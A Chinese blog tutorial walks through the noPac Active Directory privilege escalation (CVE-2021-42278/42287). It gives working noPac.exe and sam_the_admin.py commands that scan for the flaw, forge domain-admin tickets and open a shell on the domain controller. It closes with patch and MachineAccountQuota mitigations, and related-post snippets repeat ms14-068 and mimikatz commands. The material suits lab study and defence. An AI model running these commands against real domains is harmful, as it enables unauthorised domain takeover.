nopac域提权

已于 2023-09-05 11:25:32 修改
阅读量2.5k 收藏 3
点赞数 1
分类专栏: 域渗透 文章标签: 安全 网络 网络安全
于 2022-10-09 16:10:46 首次发布
仅供学习,未经许可不得擅自转载
本文链接:https://blog.csdn.net/weixin_42282667/article/details/127228662
版权

一.前言

2021年11月9日,微软Windows Active Directory 域服务权限提升漏洞,漏洞利用细节和工具被公开,漏洞编号CVE-2021-42287,CVE-2021-42278。可导致攻击者将域内普通用户提升至管理员权限等危害。该漏洞是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升漏洞。

影响版本
windows server 2008/2012/2016/2019/2022等多个版本

二.漏洞概述

CVE-2021-42278
机器账户的名字应该以$结尾,即sAMAccountName属性,但ADCS没对机器账户名进行验证,导致存在绕过。配合CVE-2021-42287漏洞可以模拟域控制器机器账户,接管域控。该组合漏洞也可称作sAMAccountName spoofing
CVE-2021-42287
使用TGT申请ST时,当kdc未找到TGT对应的账户名时,KDC会再次在目录自动搜索,并搜索结尾的机器账户。如果创建与DC机器账户名字相同的机器账户(不以结尾),账户请求一个TGT后,更名账户,然后通过约束委派协议S4U2self申请TGS Ticket。接着DC在TGS_REP阶段,这个账户不存在的时候,DC会使用自己的密钥加密TGS Ticket,提供一个属于该账户的PAC,然后我们就得到具有域控权限的st。

说白了就是:如果获得了 DC 用户的 TGT 票据且域内有一台名为 DC$ 域控,再将 DC 用户删除,此时使用该 TGT 去请求 s4u2self,如果域控制器帐户 DC$ 存在,那么 DC 就能获得域控制器帐户(机器用户DC$)的 ST 票证。

攻击流程:
1.使用普通域用户创建机器账户,并清除该机器账户的spn。默认普通域用户可以创建10个机器账户,MachineAccountQuota默认为10;
2.将机器账户的sAMAccountName属性改为DC的机器账户名字,注意不包含$符;
3.使用Rubeus为机器账户请求生成TGT;
4.将机器账户的sAMAccountName属性修改为其他名字,不与dc机器名字重复;
5.使用Rubeus工具,通过S4U2self委派协议向DC请求TGS票据,也就是委派给dc去请求kdc发起认证,生成st;
可以使用adsi管理工具查看账户属性:
adsiedit.msc

三.漏洞利用

使用nopac脚本自动化利用

https://github.com/cube0x0/noPac
工具执行环境:nopac运行需安装 .net 4.0
需要条件:需要一个域普通用户

  • 检测是否存在漏洞
noPac.exe scan -domain redteam.red -user saul -pass 'Red12345'

  • 利用漏洞申请域管权限的st
    使用域普通用户的TGT,利用漏洞请求TGS申请域控机器账户 cifs服务和ldap服务的ST凭证:
# mAccount参数:重命名后的机器账户
# mPassword参数:重命名后的机器账户密码
noPac.exe -domain redteam.red -user saul -pass 'Red12345' /dc owa.redteam.red /mAccount saulgoodman /mPassword passW0rd /service cifs /ptt
noPac.exe -domain redteam.red -user saul -pass 'Red12345' /dc owa.redteam.red /mAccount saulgoodman /mPassword passW0rd /service ldap /ptt



访问域控的文件服务,还可进行dcsync

使用sam-the-admin脚本自动化利用

https://github.com/WazeHell/sam-the-admin
为避免当前机器缓存的票据对漏洞利用产生影响,先清空机器的凭证

klist purge #清空凭证
 klist

利用漏洞执行命令:
(ps:脚本只能在kali上运行,windows会报错)

python3 sam_the_admin.py "redteam/saul:Red12345" -dc-ip 10.10.10.8 -shell

windows会报错:

四.缓解措施

1.微软官方已推出补丁:KB5008602、KB5008380;
2.通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0,中断此漏洞的利用链。MachineAccountQuota默认为10,值为0意味着普通用户无法创建机器账户,也就无法直接利用这个漏洞

参考文档

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
https://mp.weixin.qq.com/s/urKdoW9SgalZ4UtA2_1SBw
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
https://mp.weixin.qq.com/s/RvOndF3gdEZbgqrIPqXsUg

supdon
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472 利用(
墨痕诉清风的博客
01-25 2307
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
内网安全——-CVE-2020-1472&NTLM中继攻击
m0_61506558的博客
02-16 458
webserver@ #45mary-pc@#45sqlserver@#45条件:通讯双方当前用户密码一致。受害主机:web页面,出网:互联网站点都可以,不出网:1、没有网络被控主机上建立http 2、部分出网,能出http互联网站点都可以,不能出http互联网站点不可以被控主机(跳板机)上建立http
用户
wuxinweii的博客
11-21 3528
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特属性证书),也就是Client的限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高限的PAC。 该漏洞允许任何一个普通用户,将自己升至管理员限。微软给出的补丁号kb3011780。 MS14-068是非
10、内网安全-横向移动&&NetLogon&ADCS&PAC&KDC&永恒之蓝
xnxqwzy的博客
03-27 858
我个人学习是通过课程和以上文章,漏洞利用的话,基本上就是根据复现文章一步一步实现,对于的漏洞编号还是得记一记,这些常识可能面试会问到,像CVE-2017-0146(ms17-010) 要做到耳熟能详。
***之MS14-068
weixin_33728708的博客
01-12 302
0x00 前言 在做***测试时,当遇到环境,获取到一个成员账号后,如果控制器未打好补丁,则可以利用本文所到的漏洞,快速获取到控制器限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。 0x01 准备工作 成员账号及密码一个 mimikatz ms14-068.exe 03以上服务器或pc 0x02 模拟环境 控制器 2008r2 dc.test.co...
用户 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 805
环境 & 工具: win2008 --控 – 192.168.3.133 win2012 --内主机 – 192.168.3.132 :qf.com 内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个内用户的用户名和密码以及该用户的sid,获取了内一台主机的限 1,使用普通用户登录内主机Win2012,
windows CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
m0_62207170的博客
03-11 621
windows CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
CVE-2020-1472()
p01son的博客
08-02 646
CVE-2020-1472() Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472()简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472
Adminxe的博客
12-29 2339
0x00 测试环境 DC(WIN-ENS2VR5TR3N):192.168.183.130 攻击机器:192.168.183.129 0x01 对控进行测试漏洞是否存在 python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130 0x02 使用zerologon工具将控密码打成空 (这里打空的用户是控所在机器的账户,并不是控账户。) python3 set_empty_pw DC_NETBIOS_NAME DC_I..
环境姿势
懂进攻知防守
08-15 1193
Netlogon升2020年08月12日, 微软官方发布了 NetLogon 特升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
MS14-068漏洞学习(实战)&& 控服务器搭建 && 远程升 && 查看控中的sid
永不垂头的博客
08-29 424
MS14-068漏洞学习(实战)&& 控服务器搭建 && 远程升 && 查看控中的sid 文章目录MS14-068漏洞学习(实战)&& 控服务器搭建 && 远程升 && 查看控中的sid前言一、MS14-068漏洞学习二、MS14-068漏洞实战三、控服务器搭建四、远程升五、查看控中的sid六、我的公众号 前言 一、MS14-068漏洞学习 安装dcpro
MS14-068AD神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有限 好运~
环境、编辑注册表
zkwniky的博客
09-20 1076
Token(令牌),环境中 用户每次登录时,账号绑定临时的token; 访问资源时交token进行身份验证,类似于web cookie。 Delegate Token:交互会话登录,(例如直接登录、远程桌面登录) Impersonate Token:非交互登录,(例如访问文件共享) 注意:在环境中,Delegate Token账号注销后变成Impersonate Token
nopac 原理及复现
weixin_44747030的博客
10-04 4302
Nopac_ CVE-2021-42287/CVE-2021-42278复现
nopac_CVE-2021-42287&42278
Adminxe的博客
03-05 245
文章迁移CSDN:Windows服务升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行升。攻击者可利用该漏洞造成将内的普通用户升到管理员限将任意用户升到限(1)一个普通成员帐户(2)用户有创建机器用户的限(一般默认限)(3)DC未打补丁KB5008380或KB5008602。
渗透笔记-ADCS -ESC4
NoooEmotion的博客
02-06 875
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
结合CVE-2019-1040漏洞的两种利用深度分析
systemino的博客
07-03 4048
0x00 漏洞概述 2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量中继到目标服务器。PHP大马 通过这种攻击使得攻击者在仅有一个普通账号的情况下可以远程控制 Windows 内的任何机器,包括控服务器。 0x01 漏洞利...
之CVE-2020-1472复现打
good good study
03-18 4324
CVE-2020-1472 是⼀个 windows 控中严重的远程升漏洞,攻击者通过 NetLogon,建⽴与控间易受攻击的安全通道时,可利⽤此漏洞获取管访问限(将控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所导致漏洞成因,该漏洞适⽤于 Win2008 后的所有版本 利用场景:获取了一个加入了的计算机限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接...
升-Win系统升篇&AD内网控&NetLogon&ADCS&PAC&KDC&CVE漏洞
最新发布
siu~
03-28 1115
1、WIN-内用户到AD控-CVE-2014-6324 2、WIN-内用户到AD控-CVE-2020-1472 3、WIN-内用户到AD控-CVE-2021-42287 4、WIN-内用户到AD控-CVE-2022-26923 章节点: 1、Web升及转移 2、系统升及转移 3、宿主升及转移 4、升及转移

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值